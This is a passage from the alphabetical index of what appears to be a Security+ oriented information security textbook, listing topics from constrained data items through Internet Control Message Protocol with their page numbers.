constrained data items (CDIs), in Clark-Wilson security model, 37
contactless access cards, 197
containment, isolating incidents, 661
content
  antispam filters, 430
  content-based signatures, 381
  content-filtering proxy, 270
  internet content filters, 272
  protecting with IPsec, 324
  UTM appliances for inspecting, 273
  web security gateways monitoring, 271
Content Scramble System (CSS), digital rights management, 121–122
context
  context-based signatures in IDSs, 381
  protecting with IPsec, 325
contingency planning, 589
continuous risk management, 611–612
Controlling the Assault of Non-Solicited Pornography and Marketing Act (CAN-SPAM), 514, 701–702
controls (countermeasures or safeguards)
  defined, 610
  designing and evaluating, 617
Convention on Cybercrime, 699–700
convergence, 200
cookie cutter programs, privacy enhancing technologies, 730
cookies
  disabling, 550
  name-value pairs for defined purposes, 547–548
  uses of, 548–550
COPPA (Children’s Online Privacy Protection Act), 722
copyrights, digital rights management, 708–710
Core Impact toolset, 497
corporate networks. See also intranet, 242
corporate policies, BYOD concerns, 368–369
correctness of system, approaches to security, 13
cost/benefit analysis, in risk management, 626
cost-effectiveness modeling, in risk management, 626–627
Counter Mode with Cipher Block Chaining-Message Authentication Codes Protocol (CCMP)
  current security methods, 359
  in WPA2, 355
countermeasures (safeguards or controls)
  defined, 610
  designing and evaluating, 617
CP (certificate policy), 152
CPSs (certification practices statements)
  areas addressed by PKIX model, 169
  CAs and, 131
CRC (cyclical redundancy check), analysis of data stream for changes, 685
credential management, mobile applications, 371
credit card regulation, 703–704
criminal organizations, types of threats, 10
critical flags, certificate extensions and, 136
critical infrastructures
  Framework for Improving Critical Infrastructure Cybersecurity, 21–22
  threats to, 11
CRLs (certificate revocation lists)
  certificate revocation, 139–142
  certificate suspension, 139
  checking to see if certificates have been revoked, 145–146
  distribution of CRL files, 141–142
  PKIX standard and, 168–169
CRLSign, X.509 digital certificate extensions, 135
cross-certification certificates
  peer-to-peer trust model, 158
  types of certificates, 137
cross-site request forgery (XSRF)
  input validation and, 569
  overview of, 576–577
cross-site scripting attacks, client-side, 554
cross-site scripting (XSS) attacks
  input validation and, 569
  overview of, 572–573
crossover error rate (CER), 213–214
cryptanalysis
  attacks on encryption, 486
  defined, 90
  quantum cryptanalysis, 114
Cryptographic Message Syntax (CMS)
  S/MIME and, 179
  triple-encapsulated messages, 180
cryptography
  AES (Advanced Encryption Standard), 105
  algorithms, 96–97
  asymmetric encryption, 109–110, 113
  block ciphers vs. stream ciphers, 108
  Blowfish, 107
  CAST (Carlisle Adams and Stafford Tavares), 105–106
  cipher suites, 117
  comparative strength and performance of algorithms, 93
  CompTIA Security+ Exam Objectives, 753–755
  cryptographic applications, 122–123
  cryptographic errors and failure, 565
  database encryption, 123
  defined, 90
  DES (Data Encryption Standard), 103–105
  DH (Diffie-Hellman), 109–110
  digital signatures, 120–121
  DRM (digital rights management), 121–122
  ECC (Elliptic curve cryptography), 112–113
  ElGamal, 111–112
  ephemeral keys, 118
  fundamental methods in, 92–93
  hashing functions, 99–100, 102–103
  historical perspectives on, 93–94
  IDEA (International Data Encryption Algorithm), 107–108
  import/export restrictions on, 705–706
  key exchange, 117–118
  key management, 98
  key stretching, 118–119
  MD (Message Digest), 101–102
  nonrepudiation and, 117
  one-time pads, 96
  overview of, 90–92
  proven technologies for, 123
  quantum cryptography, 113–114
  random numbers and, 98, 566
  RC (Rivest Cipher), 106–107
  review and Q&A, 124–127
  RIPEMD (RACE Integrity Primitives Evaluation Message Digest), 101
  RSA (Rivest, Shamir, and Adleman), 110–111
  secrecy principles, 120
  session keys, 118
  SHA (Secure Hash Algorithm), 100–101
  steganography, 114–115
  substitution ciphers, 94–96
  symmetric encryption, 103, 108
  symmetric vs. asymmetric, 113
  transport encryption, 120
  Twofish, 107
  use in CIA, 116–117
CSR (certificate signing request), 138
CSS (Content Scramble System), digital rights management, 121–122
culture, of risk management, 612
CVE (Common Vulnerabilities and Exposures)
  application-level attacks, 572
  MITRE security management enumerations and standards, 578
  reducing code vulnerabilities, 563
CWE (Common Weakness Enumeration)
  CWE/SANS Top 25 Most Dangerous Software Errors, 563–564
  MITRE security management enumerations and standards, 578
  reducing code vulnerabilities, 563
cyber kill chain, in incident response, 669
Cyber Observable eXpression (CybOX)
  making security measurable, 669–670
  standards associated with IOCs, 669
cybercrime
  computer trespass, 699
  Convention on Cybercrime, 699–700
  current threat environment, 4–5
  list of common crime schemes, 698
  overview of, 697–698
  privacy and, 701
cybersecurity, 19
Cybersecurity Framework Model, 21–22
Cyberwar, 3
CybOX (Cyber Observable eXpression)
  making security measurable, 669–670
  standards associated with IOCs, 669
cyclical redundancy check (CRC), analysis of data stream for changes, 685
D
DAC (discretionary access control), 302
DAP (Directory Access Protocol), 539
DAT (digital audio tape), 279
data
  analysis of data streams, 687
  CompTIA Security+ Exam Objectives, 749–752
  encryption, 438–439
  ensuring forensic data is not modified, 685
  handling Big Data, 440
  high availability and fault tolerance, 599–600
  labeling, handling, disposing of, 46
  managing storage across network, 255–256
  minimization as mitigation strategies, 658
  mitigation strategies for theft or loss, 615
  ownership, 45, 366–367
  policies, 45–47
  poor security practices, 82
  securing, 439–440
  storing, 440–441
  unauthorized sharing, 45
  volatility of, 679
  web security gateways protecting, 271
data at rest, data security, 440
Data Breach Investigations Report (DBIR), Verizon, 12
data breaches
  current threat environment, 6–7
  privacy, 733
Data Encryption Standard. See DES (Data Encryption Standard)
data in transit, data security, 440
data in use, data security, 440
data link layer (Layer 2), OSI
  bridges and switches operating at, 257–258
  Ethernet and Layer 2 addresses, 233
data loss prevention (DLP)
  overview of, 304
  protecting data transfer, 272
Data Over Cable Service Interface Specification (DOCSIS), 265
Data Protection Directive (EU), 721–722
data protection, European statutes, 728
databases
  encrypting, 123, 439
  NoSQL database vs. SQL database, 579
DataEncipherment, X.509 digital certificate extensions, 135
datagrams
  defined, 225
  encrypting, 327–329
  IP packets, 226–227
DBIR (Data Breach Investigations Report), Verizon, 12
DCS (distributed control systems), hardening SCADA systems, 454
DDoS (distributed denial-of-service) attacks, 476–477
decentralized PKI infrastructures, 146–147
decision making, risk management as, 608
decision trees, IDS analysis engine using, 390
default deny, fail-safe defaults, 25–26
defense in depth
  in alternative environments, 459
  overview of, 29–31
  security perimeter and, 60
degaussing media, 47
delta backups, 592–594
demilitarized zone (DMZ)
  diversity of defense, 31
  overview of, 240–241
demonstrative evidence, 676
denial-of-service. See DoS (denial-of-service) attacks
Department of Defense (DoD), TEMPEST program, 66–67
Department of Justice (DOJ), incident response best practices, 667–668
deprecated functions, 566
DES (Data Encryption Standard)
  S/MIME and, 178
  supported by WTLS, 340
  symmetric encryption algorithm, 103–104
design phase, software development, 562
detection
  of incidents, 659–660
  in operational model of computer security, 20
development lifecycle, software development, 560
devices
  configuring in network hardening, 442–443
  forensics, 688
  Group Policy blocking access to, 451–452
  infrastructure security, 253
  inline network devices, 395
  mobile devices. See mobile devices
  network segmentation limiting communication between, 457–458
  removing to isolate incidents, 661–662
  theft, 203–204
  wireless devices, 264–265
DH (Diffie-Hellman)
  IPsec using, 327
  key exchange, 118
  overview of, 109–110
  PGP using, 181
  S/MIME v3 support, 179
  SSL/TLS using, 533
DHCP (Dynamic Host Configuration Protocol)
  managing address space with, 266
  overview of, 238
diagnostics, network, 268–269
Diameter, 314
dictionary attacks, 491
differential backups, 592–593
differential cryptanalysis, 91
Diffie-Hellman. See DH (Diffie-Hellman)
Diffie, Whitfield, 109–110
diffusion, secrecy principles, 120
digital audio tape (DAT), 279
digital certificates
  in asymmetric encryption, 109
  attributes, 135–137
  CAs (certificate authorities) and, 130–131
  certificate-based threats, 160–161
  certificate repositories, 143
  classes of, 132
  defined, 128, 130
  for establishing authenticity, 308–309
  extensions, 135–136
  IPsec using, 327
  key destruction, 142
  lifecycle, 137
  overview of, 134–135
  RAs (registration authorities) and, 131–132
  registration and generation, 137–138
  renewal, 138–139
  revocation, 139–142
  stolen, 161
  suspension, 139
  trust and certificate verification, 143–146
  what they are, 172
digital forensics. See also computer forensics, 676
digital linear tape (DLT), 279
Digital Millennium Copyright Act (DMCA), 709
digital rights management (DRM), 121–122, 708–710
digital sandbox, 396
Digital Signature Standard (DSS), 100
digital signatures
  in asymmetric encryption, 109–110
  Canadian laws, 708
  code signing, 551–552
  ElGamal used for, 111
  European laws, 708
  overview of, 120–121
  RSA protocol used for, 111
  services provided by S/MIME, 179
  U.N. laws, 707–708
  U.S. laws, 707
  X.509 digital certificate extensions, 135
digital video discs. See DVDs (digital video discs)
direct evidence, 676
direct-sequence spread spectrum (DSSS), 348
Directory Access Protocol (DAP), 539
directory services, 539–540
directory traversal attacks, 575
disaster recovery
  alternative backup sites, 596–597
  backout planning, 601
  backup frequency and retention, 594–596
  backup storage, 596
  backup strategies, 592–594
  backups and, 591–592
  categories of business functions, 588–589
  cloud computing and, 599
  failure and recovery timing, 600–601
  high availability and fault tolerance, 599–600
  IT contingency planning, 589
  overview of, 587
  plans, 587–588
  RAID (Redundant Array of Independent Disks), 601–602
  recovery time objectives and recovery point objectives, 591
  redundancy of spare parts, 602–603
  secure recovery, 598–599
  tabletop exercises, 590
  tests, exercises, and rehearsals, 589–590
  utility and power interruptions, 597–598
disaster recovery plan. See DRP (disaster recovery plan)
Discovery, 377
disk wipe utilities, for computer forensics, 682
disposal and destruction policies, dumpster diving and, 46–47
distinguished names, X.500 standard, 144
distributed control systems (DCS), hardening SCADA systems, 454
distributed denial-of-service (DDoS) attacks, 476–477
diversity of defense, 31
DKIM (DomainKeys Identified Mail), 517
DLP (data loss prevention)
  overview of, 304
  protecting data transfer, 272
DLT (digital linear tape), 279
DMCA (Digital Millennium Copyright Act), 709
DMZ (demilitarized zone)
  diversity of defense, 31
  overview of, 240–241
DNS cache poisoning, 235
DNS (Domain Name System)
  how it works, 236
  remote packet delivery, 235
DNS kiting, 488
DNS poisoning
  attacks on address system (IP addresses), 488
  pharming attacks and, 76
DNS spoofing attacks, 489
DNSBL (DNS blacklisting), 515
DNSSEC
  hardening Windows Server 2012, 415
  remote packet delivery, 235
DOCSIS (Data Over Cable Service Interface Specification), 265
documentary evidence, 676
DoD (Department of Defense), TEMPEST program, 66–67
DOJ (Department of Justice), incident response best practices, 667–668
domain controllers
  hardening Windows Server 2008, 414
  password policy, 293
Domain Name System. See DNS (Domain Name System)
domain password policy, 293–294
DomainKeys Identified Mail (DKIM), 517
domains, setting passwords for, 294
doors
  mantraps, 198
  in physical security, 195
DoS (denial-of-service) attacks
  Cyberwar, 3
  defending against, 476–477
  distributed, 476
  ICMP executing, 229, 231
  overview of, 474–475
  performing with physical access, 194
  smurf attacks, 476
  types of old school attacks, 652
drive-by download attacks, 494
drive imaging, 194, 683
DRM (digital rights management), 121–122, 708–710
DRP (disaster recovery plan)
  categories of business functions, 588–589
  compared with business continuity plan, 589
  overview of, 587–588
  tests, exercises, and rehearsals, 589–590
DSL modems, 265–266
DSS (Digital Signature Standard), 100
DSSS (direct-sequence spread spectrum), 348
dual control, of cryptographic keys, 150
due care, in defining reasonable behavior, 53
due diligence, in defining reasonable behavior, 53
due process, in guaranteeing individual rights, 54
dumpster diving
  disposal and destruction policies and, 46–47
  poor security practices, 80–81
duplication, investigation of incidents, 665
Duqu, 5–6
DVDs (digital video discs)
  autoplay, 201
  boot disk attacks, 192–194
  types of optical media, 279–280
Dynamic Host Configuration Protocol (DHCP)
  managing address space with, 266
  overview of, 238
dynamic NAT, 239
E
e-discovery (electronic discovery), computer forensics, 689–690
e-mail
  DKIM detecting spoofing, 517
  encrypting, 517–518
  firewalls and, 505
  header and body in structure of, 506–508
  hoaxes, 513–514
  how it works, 505–506
  hygiene, 512
  malicious code and, 510–513
  MIME protocol in, 508–509
  PGP, 520–521
  phishing attacks via, 75
  review and Q&A, 526–529
  S/MIME, 179, 518–520
  scanning for viruses, 429
  security of, 509–510
  SIDF blocking spam, 516–517
  spam, 514–516
  spoofing attacks, 480
e-mail usage policy, human resources policies, 51
EAP (Extensible Authentication Protocol)
  authentication mechanisms in PPP, 318
  current security methods, 357
  overview of, 319–320
EAP-MD5, 357–358
EAP-TLS, 312, 357–358
EAP-TTLS, 357–358
EAPOL (Extensible Authentication Protocol over LAN), 311–312
Early Launch Anti-Malware (ELAM), hardening Windows Server 2012, 415
eavesdropping
  attacks on SSL/TLS, 534
  recent advances in, 67
  van Eck phenomenon, 66–67
ECC (Elliptic curve cryptography), 112–113
ECDH (Elliptic Curve Diffie-Hellman), 110, 113
ECDHE (Elliptic Curve Diffie-Hellman Ephemeral), 110, 119
economy of mechanism, Saltzer and Schroeder’s eight principles of security design, 26–27
ECPA (Electronic Communications Privacy Act), 700–701, 702
EDH (Ephemeral Diffie-Hellman), 110, 119
EDR (enhanced data rate), 344
EDRM (Electronic Discovery Reference Model), 689–690
EFS (Encrypting File System), 123
egress filtering, antispam products, 431
ELAM (Early Launch Anti-Malware), hardening Windows Server 2012, 415
elasticity, hosts and, 254–255
Electric Power Grid, historical security incidents, 4
electromagnetic eavesdropping, 66–67
electromagnetic interference (EMI), 209–210
electronic access control systems
  access tokens, 210–211
  biometrics, 211–214
  doorways and, 197–198
  multiple-factor authentication, 214–215
  smart cards, 211
Electronic Communications Privacy Act (ECPA), 700–701, 702
Electronic Discovery Reference Model (EDRM), 689–690
electronic key exchange, in RSA protocol, 111
electronic media, 280–281
Electronic Privacy Information Center (EPIC), 720
ElGamal, 111–112
elite hackers, 9
Elliptic curve cryptography (ECC), 112–113
Elliptic Curve Diffie-Hellman (ECDH), 110, 113
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE), 110, 119
embedded systems, hardening, 455
emergency power off (EPO) switches, 209
EMI (electromagnetic interference), 209–210
employee hiring and promotions, human resources policies, 48–49
employees
  eliminating accounts of former, 48
  mandatory vacations, 49
  retirement, separation, or termination, 49
  succession planning, 586–587
Encapsulating Security Payload (ESP)
  encrypting data portion of datagram, 327–329
  IPsec, 182–183
enclaves, 243–244
Encrypting File System (EFS), 123
encryption
  algorithms. See algorithms
  attacks on, 486–487
  cryptography compared with, 91
  data encryption, 438–439
  example of security methods working against each other, 31
  hardware devices in, 437–438
  how PGP works, 180–181
  IM programs lacking support for, 523–524
  import/export restrictions on, 705–706
  man-in-the-middle attacks on encrypted traffic, 483–484
  mobile application security, 371–372
  mobile device security, 363
  PKI and, 129
  privacy and, 729
  S/MIME services, 178
  SSL and TLS protocols, 531–536
  steganography compared with, 114–115
encryption, of e-mail
  overview of, 517–518
  PGP, 520–521
  S/MIME, 518–520
end-entity certificates
  PKIX standard and, 168
  types of certificates, 136
endpoints, tunneling protocols, 318
enhanced data rate (EDR), 344
enhanced security services (ESS), for S/MIME, 179
Enigma machine, 94
enterprise management, integrated into host-based IPS, 394
entropy, randomness and, 98
enumeration attacks, 652
environmental controls, 204
environmental issues
  fire suppression, 64
  HVAC (heating, ventilation, and air conditioning), 63–64
  UPS (uninterruptible power supply), 64
Ephemeral Diffie-Hellman (EDH), 110, 119
ephemeral keys, 118
EPIC (Electronic Privacy Information Center), 720
EPO (emergency power off) switches, 209
eradication, isolating incidents, 661
errors/exception handling
  bug tracking, 571–572
  cryptographic errors and failure, 565
  exception management, 22–23
  language-specific failures, 566
  software development, 568
escalation, incident response, 663
ESP (Encapsulating Security Payload)
  encrypting data portion of datagram, 327–329
  IPsec, 182–183
ESS (enhanced security services), for S/MIME, 179
Ethernet
  network protocol, 224
  packet delivery and, 233
  UTP/STP cable, 274–275
ethics, 14, 710–712
European privacy laws, 728–729
EVDO (Evolution Data Optimized)
  3G mobile networks, 342
  demand for data services and, 339
event logs, security templates, 453
evidence
  acquiring, 679–681
  analysis of, 684
  chain of custody, 684
  identifying, 681
  protecting, 681
  rules regarding, 677
  standards for, 676–677
  storing, 682
  transporting, 682
  types of, 675–676
evil twin attacks, 352
Evolution Data Optimized (EVDO)
  3G mobile networks, 342
  demand for data services and, 339
evolutionary model, software development process models, 559
exceptions. See errors/exception handling
exclusionary rule, of evidence, 677
eXclusive OR (XOR), use in cryptography, 97
exercises, disaster recovery, 589–590
expiration, account and password, 297, 304
exposure factor, 611
eXtensible Access Control Markup Language (XACML), 304
Extensible Authentication Protocol. See EAP (Extensible Authentication Protocol)
extranet, 242–243
F
Facebook, problem of sharing too much information, 57
FACTA (Fair and Accurate Credit Transactions Act), 725
fail-safe defaults, Saltzer and Schroeder’s eight principles of security design, 26
Fair Credit Reporting Act (FCRA), 725
fake URL, client-side attacks, 494
false negatives
  IDSs, 382
  physical access controls, 213–214
false positives
  IDSs, 382
  physical access controls, 213–214
Family Education Records and Privacy Act (FERPA), 721
fault tolerance, 269, 599–600
FC (Fibre Channel), 247
FCoE (Fibre Channel over Ethernet), 247
FCRA (Fair Credit Reporting Act), 725
FDDI (Fiber Distributed Data Interface), 224
Federal Information Processing Standards Publications (FIPS), 183
Federal Trade Commission. See FTC (Federal Trade Commission)
fences, in physical security, 195
FERPA (Family Education Records and Privacy Act), 721
Fiber Cable Cut, 4
Fiber Distributed Data Interface (FDDI), 224
fiber-optic cable, 275–276
Fibre Channel (FC), 247
Fibre Channel over Ethernet (FCoE), 247
file permissions
  in Mac OS X, 422
  security templates and, 453
  in UNIX, 302
file sharing, IM (instant messaging) and, 523
File Transfer Protocol. See FTP (File Transfer Protocol)
File Transfer Protocol Secure (FTPS), 322–323
file viewers, tools for computer forensics, 682
files
  encrypting, 439
  host forensics, 685–687
FileVault, hardening Mac OS X, 422
filters
  antispam products, 430–431
  content-filtering proxy, 270
  internet content filters, 272
  MAC filtering, 359
  URL filters, 272
FIPS (Federal Information Processing Standards Publications), 183
fire suppression
  fire detection, 207–208
  fire extinguishers, 206–207
  organizational security, 64
firewalls
  application firewalls, 458
  auditing firewall rules, 499
  dealing with unauthorized access, 282
  e-mail and, 505
  hardening Mac OS X, 422
  how they work, 261–263
  integrated into host-based IPS, 394
  location of NIDS relative to, 384–385
  next-generation firewalls, 263
  overview of, 260–261
  security methods working against each other, 31
  software firewalls, 435–436
  web application firewalls vs. network firewalls, 264
  Windows Firewall, 413, 436
firmware
  update, 442
  version control, 458
first responders
  in forensic investigation, 679
  in incident response, 660–661
Flame, current threat environment, 5–6
flash cards, types of electronic media, 280
flat networks, 243
floppy disks
  boot disk attacks, 192–194
  types of magnetic media, 278
FOIA (Freedom of Information Act), 720–721
footprinting attacks, types of old school attacks, 652
forensics. See also computer forensics
  defined, 674
  forensic images, 194, 983
  forensic programs, 682
  forensic workstations, 681, 682
  making security measurable, 669–670
fragmentation, packet, 225–226
frames, Ethernet and Frame Relay, 225
Framework for Improving Critical Infrastructure Cybersecurity, 21–22
fraud. See also CFAA (Computer Fraud and Abuse Act), 697
free space, system forensics and, 686
Freedom of Information Act (FOIA), 720–721
FTC (Federal Trade Commission)
  CAN-SPAM (Controlling the Assault of Non-Solicited Pornography and Marketing Act), 514
  enforcing Safe Harbor, 729
  red flag rules, 726
  role in computer crime, 699
FTP (File Transfer Protocol)
  in communication between client and server, 322–323
  overview of, 540
  retrieving certificates from repositories, 170
FTPS (File Transfer Protocol Secure), 322–323
full backup, 592
full disk encryption, 438–439
full duplex mode, switches, 257
fuzzing
  overview of, 571
  in testing phase of software development, 567–568
  use by hackers, 493
G
games
  hardening game consoles, 457
  installing unauthorized hardware or software, 82
Gantt charts, tools for risk management, 626
Gatekeeper application, hardening Mac OS X, 422
gates, in physical security, 195
gateways, 270
general risk management model
  asset identification, 616
  control design and evaluation, 617
  impact determination and quantification, 617
  residual risk management, 618
  threat assessment, 616–617
generators, utility and power interruptions and, 598
geo-tagging, location services, 370
GhostNet, 5
GLBA (Gramm-Leach-Bliley Act)
  governing collection of information, 719
  overview of, 702–703
  privacy features of, 724
Global Positioning System (GPS), 364
globally unique identifiers (GUIDs), 450
GnuPG, 123
goals, of incident response, 654
GPG (GNU Privacy Guard), 123, 180
GPOs (group policy objects)
  domain password policy, 293
  hardening Windows OSs, 416
  system hardening, 450–451
GPS (Global Positioning System), 364
Gramm-Leach-Bliley Act. See GLBA (Gramm-Leach-Bliley Act)
graphical user interfaces (GUIs), 418
grey-box testing, 567
greylisting, in blocking spam, 516
Group Policy
  access control policies, 32–33
  referencing with GUIDs, 450
  system hardening, 450–452
group policy objects (GPOs). See GPOs (group policy objects)
groups
  Administrators group, 291
  auditing, 290
  group level authentication, 291–292
  overview of, 291–292
  security templates restricting, 453
guards, in physical security, 196
guidelines, security, 43–44
GUIDs (globally unique identifiers), 450
GUIs (graphical user interfaces), 418
H
hackers/hacking
  basic security terminology, 19
  black-hat and white-hat, 497
  defined, 9
  pros/cons of hiring, 48
hacktivist attacks, on specific targets, 12
halon-based fire suppression systems, 205–206
handshake, TCP, 228–229
handshake, TLS, 533
hard drives
  encryption services of, 438
  tools for computer forensics, 682
  types of magnetic media, 278
hardening
  applications. See applications, hardening
  defined, 408
  host hardening. See host hardening
  OSs (operating systems), 240
  system hardening. See system hardening
hardware
  encryption devices, 437–438
  installing unauthorized, 81–82
  securing, 436–437
hardware security modules (HSMs)
  hardware encryption devices, 438
  safeguarding cryptographic keys, 147–148
hash values
  in detecting intrusion, 411
  hashing functions and, 99
hashing algorithms
  ensuring forensic data is not modified, 685
  integrity and, 116
  IPsec using, 327
  MD (Message Digest), 101–102
  overview of, 99–100
  RIPEMD (RACE Integrity Primitives Evaluation Message Digest), 101
  SHA (Secure Hash Algorithm), 100–101
  summary, 102–103
  types of encryption algorithms, 96
Haystack, 377
hazards, 611
HD (high-definition) optical media, 280
header manipulation
  client-side attacks, 494
  violating CAN-SPAM act, 701
headers
  client-side attacks, 554
  in e-mail structure, 506–508
  spam filtering and, 430
Health Information Technology for Economic and Clinical Health Act (HITECH), 723–724
Health Insurance Portability and Accountability Act (HIPAA), 723–724
hearsay rule, rules of evidence, 677
Heartbleed vulnerability
  in OpenSSL cryptography, 79
  passwords and, 297
heating, ventilation, and air conditioning. See HVAC (heating, ventilation, and air conditioning)
Hellman, Martin, 109–110
heuristic scanning, antivirus products, 427–428
hex characters, 570
hidden files, system forensics and, 686
HIDSs (host-based IDSs)
  active and passive, 393
  advanced capabilities, 393–394
  advantages/disadvantages, 391–393
  defined, 378
  overview of, 388–391
  security devices, 267
hierarchical trust model, 155–157
high availability, 599–600
High Speed Packet Access (HSPA)
  3G mobile networks, 342
  demand for data services and, 339
highly structured threats, information warfare as, 11
hijacking attacks. See TCP/IP hijacking
HIPAA (Health Insurance Portability and Accountability Act), 723–724
hiring policies, 48
HITECH (Health Information Technology for Economic and Clinical Health Act), 723–724
HMAC, IPsec using, 327
HMAC-based One-Time Password (HOTP), 117
hoaxes
  e-mail, 513–514
  security of e-mail and, 509
  social engineering attacks, 77–78
  viruses, 468
honeynets, 397
honeypots, 396–397
host-based IDSs. See HIDSs (host-based IDSs)
host forensics
  file systems, 685–687
  Linux metadata, 688
  overview of, 685
  Windows metadata, 687–688
host hardening, 427–430
  antimalware, 426–427
  antispam, 430–431
  antispyware, 431–432
  AppLocker, 434
  hardening Mac OS X, 421–423
  hardening UNIX/Linux OSs, 417–421
  hardening Windows OSs, 413–417
  hardware security, 436–437
  host-based firewalls, 435–436
  host-based security controls, 437–440
  hotfixes, service packs, and patches, 423–426
  machine hardening, 411
  operating system security and, 412
  overview of, 410–411
  pop-up blockers, 432–433
  software baselining, 437
  Trusted OSs, 434–435
  whitelisting and blacklisting applications, 434
  Windows Defender, 431–432
hosts
  calculating, 238
  CompTIA Security+ Exam Objectives, 749–752
  security approaches, 23
  virtualization providing availability and elasticity, 254–255
  vulnerability scanners, 448–449
hot sites, alternative backup sites, 597
hotfixes, host hardening, 423–426
HOTP (HMAC-based One-Time Password), 117
HSMs (hardware security modules)
  hardware encryption devices, 438
  safeguarding cryptographic keys, 147–148
HSPA (High Speed Packet Access)
  3G mobile networks, 342
  demand for data services and, 339
HSTS (HTTP Strict Transport Security), 538–539
HTML (Hypertext Markup Language), 530
HTTP (Hypertext Transfer Protocol)
  for data transfer over web, 537–539
  header manipulation, 554
  Internet services, 242
  retrieving certificates from repositories, 170
  web application firewalls and, 264
HTTP Strict Transport Security (HSTS), 538–539
HTTPS Everywhere, 538
HTTPS (HTTP Secure)
  for data transfer over web, 537–539
  SSL and/or TLS used with, 182
  web application firewalls and, 264
hubs, 257–258
human resources policies, 47–53
HVAC (heating, ventilation, and air conditioning)
  environmental controls, 204
  environmental issues, 63–64
  hardening embedded systems, 455
hybrid clouds, 284
hybrid (mixed) topology, 223
hybrid password attacks, 492
hybrid trust model, 159–160
Hypertext Markup Language (HTML), 530
Hypertext Transfer Protocol. See HTTP (Hypertext Transfer Protocol)
I
IaaS (Infrastructure as a Service)
  cloud computing and, 284
  overview of, 599
IC3 (Internet Crime Complaint Center), 698
ICMP (Internet Control Message Protocol)
  in IPv6, 226
  message codes, 230–231
  overview of, 229–231
  preventing attacks of, 476
  pros/cons of block, 231
ICS (industrial control systems), 454
ID badges, 211
IDEA (International Data Encryption Algorithm)
  IPsec using, 327
  PGP and, 181
  SSH and, 322
  symmetric encryption algorithms, 107–108
  WTLS supporting, 340
identity management. See also authentication, 305–306
identity theft, 725
Identity Theft and Assumption Deterrence, 719
IDs. See user IDs
IDSs (intrusion detection systems)
  active vs. passive tools, 402–403
  banner grabbing, 403–404
  compared with IPSs, 396
  false negatives and false positives, 382
  history of, 377–378
  honeypots/honeynets, 396–397
  host-based. See HIDSs (host-based IDSs)
  models, 379–381
  network-based. See NIDSs (network-based IDSs)
  in network security, 24
  overview of, 376, 378–379
  port scanner, 400–402
  protocol analyzers, 398–399
  review and Q&A, 405–407
  security devices, 267
  security perimeter and, 60
  signatures, 381–382
  SPAN (Switched Port Analyzer), 400
  tools, 398
  in UTM system, 272
IE (Internet Explorer). See also browsers, 433
IEEE 802.11
  attacks, 350–354
  overview of, 347–348
  speed and frequency ranges for 802.11 family, 337
  various standards, 348–350
  wireless standard, 65
IEEE 802.1X
  implementing, 357–359
  remote access methods, 311–312
  wireless protocols, 312
IEEE 802.3. See also Ethernet, 233
IEEE (Institute for Electrical and Electronics Engineers), code of ethics, 48
IETF (Internet Engineering Task Force)
  PKIX standard, 134
  PKIX standards, 168–170
  S/MIME standard, 178–179
  SSL/TLS standard, 532
  TLS working group, 173
IGMP (Internet Group Management Protocol), 226
IIS management interface, hardening Windows Server 2008, 414
IKE (Internet Key Exchange), 175, 329
ILOVEYOU worm, 3, 512
IM (instant messaging)
  compared with e-mail, 510
  modern systems for, 524–525
  overview of, 522–524
  securing, 524
IMAP (Internet Message Access Protocol), 505
impacts
  in calculating risks, 624
  defined, 610
  determining in risk management model, 617
implicit deny, fail-safe defaults, 26
in-vehicle computer systems, hardening, 457
incident management
  defined, 642
  risk mitigation and, 615
incident response
  cyber kill chain in, 669
  defined, 651
  DOJ best practices, 667–668
  establishing management team for, 651–652
  follow-up/lessons learned, 666–667
  forensics compared with, 675
  foundations of, 651
  goals of, 654
  identification and detection phases of, 659–660
  implementing security measures, 658–659
  initial response phase, 660–661
  investigation phase, 664–665
  IOCs (Indicators of Compromise), 668–669
  isolating incident, 661–663
  metrics for security, 669–670
  NIST standards, 667
  overview of, 650
  planning and deploying strategies, 663–664
  policies and procedures, 54, 655
  preparing for, 655–658
  process of, 654–655
  recovery/reconstitution procedures, 665–666
  reporting incident, 666
  review and Q&A, 671–673
  types of attacks, 652–654
incident response team, 656–658
incidents, defined, 651
increased data center density, 204
incremental backups, 592–593
Indicators of Compromise (IOCs), artifacts of intrusion, 668–669
industrial control systems (ICS), 454
information
  criticality in planning incident response, 651
  OECD fair information practices, 727
  personally identifiable. See PII (personally identifiable information)
  security basics, 19
Information Systems Audit and Control Association (ISACA), 612
Information Systems Security Association (ISSA), 48
information warfare, 10–11
Infrastructure as a Service (IaaS)
  cloud computing and, 284
  overview of, 599
infrastructure, PKI
  centralized and decentralized, 146–147
  overview of, 130
infrastructure security
  BYOD concerns, 369
  cloud computing, 283–284
  coaxial cable, 274
  concentrators, 264
  content and malware inspection, 273
  devices, 253
  DLP (data loss prevention), 272
  electronic media, 280–281
  fiber-optic cable, 275–276
  firewalls, 260–264
  Framework for Improving Critical Infrastructure Cybersecurity, 21–22
  hubs, bridges, and switches, 257–258
  IDSs (intrusion detection systems), 267
  internet content filters, 272
  load balancers, 269
  magnetic media, 282–283
  media, 273, 281–282
  mobile devices, 255
  modems, 265–266
  monitoring and diagnostics, 268–269
  NAS (Network Attached Storage), 255–256
  network access control, 267–268
  network components, 256
  NICs (network interface cards), 256–257
  optical media, 279–280
  overview of, 252
  PBX (private branch exchange), 266
  physical security concerns, 282–283
  proxies, 270–271
  removable media, 277–278
  removable storage, 256
  review and Q&A, 285–287
  routers, 258–259
  threats to critical infrastructure, 11
  unguided media, 276–277
  URL filters, 273
  UTM (unified threat management), 272–273
  UTP/STP cable, 274–275
  virtualization, 254–255
  VPN concentrator, 266–267
  web security gateways, 271
  wireless devices, 264–265
in-house CAs, 152–153
initialization vector (IV)
  in chosen-plaintext attack, 340
  WEP weakness based on, 353–354
injection attacks
  client-side attacks, 494
  defending against, 575
  types of, 573–574
inline network devices, 395
inlining, 552
input/output validation, software development and, 568–571
insiders
  obtaining insider information, 74–75
  types of threats, 9–10
instant messaging. See IM (instant messaging)
Institute for Electrical and Electronics Engineers. See IEEE (Institute for Electrical and Electronics Engineers)
intangible impacts, impact determination and quantification, 617
integer overflow attacks, 493, 576
Integrated Services Digital Network (ISDN), 318
integrity
  in CIA, 20
  of code, 643–644
  uses of cryptography, 116
  WTLS and, 340
integrity models
  Biba model, 36
  Clark-Wilson model, 36–37
  overview of, 35
intellectual property rights, 708–710
interconnection security agreements (ISAs), 59
interfaces
  GUIs (graphical user interfaces), 418
  securing management interfaces, 443
  user interface in IDSs, 379
Internet
  content filters, 272
  internet usage policy, 51
  network architectures, 221
  overview of, 241–242
Internet Control Message Protocol. See ICMP (Internet Control Message Protocol)
